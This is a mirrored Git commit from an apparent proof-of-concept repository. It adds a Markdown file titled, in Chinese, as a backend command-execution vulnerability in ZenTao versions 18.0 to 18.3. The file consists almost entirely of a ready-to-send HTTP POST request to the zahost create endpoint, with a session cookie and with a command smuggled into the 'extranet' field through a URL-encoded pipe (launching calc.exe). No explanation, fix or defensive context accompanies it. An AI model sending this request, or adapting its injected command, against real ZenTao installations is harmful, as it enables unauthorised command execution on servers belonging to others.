mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 禅道 v18.0-v18.3 存在后台命令执行漏洞.md
This commit is contained in:
parent
e971ae2b09
commit
30839e0966
23
禅道 v18.0-v18.3 存在后台命令执行漏洞.md
Normal file
23
禅道 v18.0-v18.3 存在后台命令执行漏洞.md
Normal file
@ -0,0 +1,23 @@
|
||||
## 禅道 v18.0-v18.3 存在后台命令执行漏洞
|
||||
```
|
||||
|
||||
POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
|
||||
Host: xxx.xxx.xxx.xxx
|
||||
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:109.0)Gecko/20100101 Firefox/111.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://xxx.xxx.xxx.xxx/zentaopms/www/index.php?m=zahost&f=create
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 134
|
||||
Origin: http://xxx.xxx.xxx.xxx
|
||||
Connection: close
|
||||
Cookie: zentaosid=fwaf16g51w678678qw686;
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
vsoft=kvm&hostType=physical&name=penson&extranet=xxx.xxx.xxx.xxx%7Ccalc.exe&cpuCores=
|
||||
2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=z
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user